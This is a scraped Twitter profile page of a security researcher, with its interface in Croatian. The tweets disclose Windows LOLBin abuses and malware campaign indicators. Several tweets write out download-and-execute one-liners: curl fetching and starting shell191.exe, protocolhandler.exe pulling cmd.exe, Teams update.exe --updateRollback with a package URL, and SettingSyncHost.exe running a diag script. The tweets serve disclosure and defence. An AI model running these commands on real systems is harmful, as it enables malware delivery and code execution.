Reegun

@reegun21

Threat - Researcher - Engineer - - #800080 Teamer - Security Trainer - Father

Vrijeme pridruživanja: prosinac 2009.

Tweetovi

Blokirali ste korisnika/cu @reegun21

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @reegun21

  1. Prikvačeni tweet
    4. velj

    is back, Connects to 194.36.188[.]132 via Email campaign c2/[random].png - PS script c2/[random].jpg - PS script c2/[random].asp - encrypted c2/[random].asp - encrypted

    Poništi
  2. proslijedio/la je Tweet
    3. velj

    TeamViewer stored user passwords encrypted, not hashed, and the key is now public

    Poništi
  3. proslijedio/la je Tweet
    2. velj

    SettingSyncHost.exe as a LolBin cd %TEMP% & c:\windows\system32\SettingSyncHost.exe -LoadAndRunDiagScript foo

    Poništi
  4. 28. sij
    Prikaži ovu nit
    Poništi
  5. 28. sij

    .exe is the new .exe  -   Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info -

    Prikaži ovu nit
    Poništi
  6. 24. sij

    download via Binary .exe C:\[office installed folder]\root\[version]\ protocolhandler.exe "http://192.168.1.111/cmd.exe" cc

    Poništi
  7. 23. sij

    Fixed now. Found during house keeping my notebook,Thought of sharing to community.

    Poništi
  8. proslijedio/la je Tweet
    7. sij
    Prikaži ovu nit
    Poništi
  9. Poništi
  10. proslijedio/la je Tweet
    13. ruj 2019.

    The following paths within %windir% are writable by any user. Now you know. Security descriptor auditing is valuable.

    Prikaži ovu nit
    Poništi
  11. 9. ruj 2019.

    I clarified some of the areas in the same writeup , You can find the latest update here

    Prikaži ovu nit
    Poništi
  12. 8. ruj 2019.
    Prikaži ovu nit
    Poništi
  13. 8. ruj 2019.

    | Exe Sideloading aka Exe proxying attack technique, Most of the / applications affected, No need of installation. Medium : Youtube : Thanks to ,

    Prikaži ovu nit
    Poništi
  14. 24. srp 2019.

    wave ,Stolen creds are sent to 'megauj@gmail.com' , The adversary was already covered by 1F722BFF2471A5773A1A6724675AAE1C

    Poništi
  15. 19. srp 2019.
    Poništi
  16. 13. srp 2019.
    Prikaži ovu nit
    Poništi
  17. 13. srp 2019.

    Unsanitized file validation leads to payload download via Office binaries, Using known feature we can execute the downloaded payload. Microsoft said , The behaviour was intentionally designed. Writeup : POC :

    Prikaži ovu nit
    Poništi
  18. 1. srp 2019.

    Found another vulnerable parameter where Microsoft Teams do remote download and execute. Vulnerable parameter : update.exe --updateRollback=URL to package squirrel.exe --updateRollback=URL to package CC:

    Poništi
  19. 1. srp 2019.
    Poništi
  20. 30. lip 2019.

    Microsoft 'OneDrive' in %localappdata% with write access by default installation , Malware/Insiders can able to disguise the execution. Org's , push your installation to "C:\Program Files (x86)" Fix: OneDriveSetup.exe /allusers

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·